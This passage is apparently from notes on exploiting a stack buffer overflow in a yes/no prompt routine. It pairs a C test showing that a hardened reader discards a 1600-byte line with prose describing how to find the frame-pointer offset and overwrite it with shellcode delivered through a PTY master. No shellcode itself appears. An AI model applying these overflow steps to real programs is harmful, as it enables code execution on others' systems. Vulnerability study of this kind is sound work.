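 * steps above), then a plain "y".  Returns 1 only if the long line reads as
 * "no", its junk is discarded, and the following "y" still reads as "yes". */
int demo_long_line(void)
{
    static char input[1 + 1600 + 3];
    input[0] = 'n';
    memset(input + 1, 'A', 1600);
    memcpy(input + 1601, "\ny\n", 3);
    FILE *in = tmpfile(), *out = tmpfile();  /* stand-in stdin; prompts discarded */
    if (in == NULL || out == NULL)
        return -1;
    fwrite(input, 1, sizeof input, in);
    rewind(in);
    int first  = ask_yorn_safe(in, out, "Forget the whole thing");
    int second = ask_yorn_safe(in, out, "Already have an account");
    fclose(in);
    fclose(out);
    return (first == 0 && second == 1) ? 1 : 0;
}
```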
The follow-up here would be to use the getsmashoffset program I created to locate exactly how many bytes it takes to reach the %fp, and then to smash the fuck out of it with some shellcode in the PTY buffer instead of ‘A’s.
Checking PTY buffer send size
I originally got back to the promised land by using
write (fd_master,buff2,200);
and sending enough 200-byte chunks to total 1600 bytes, followed by a CTRL-J.
I have now tested that
write (fd_master,buff2,1600);
will also work just right.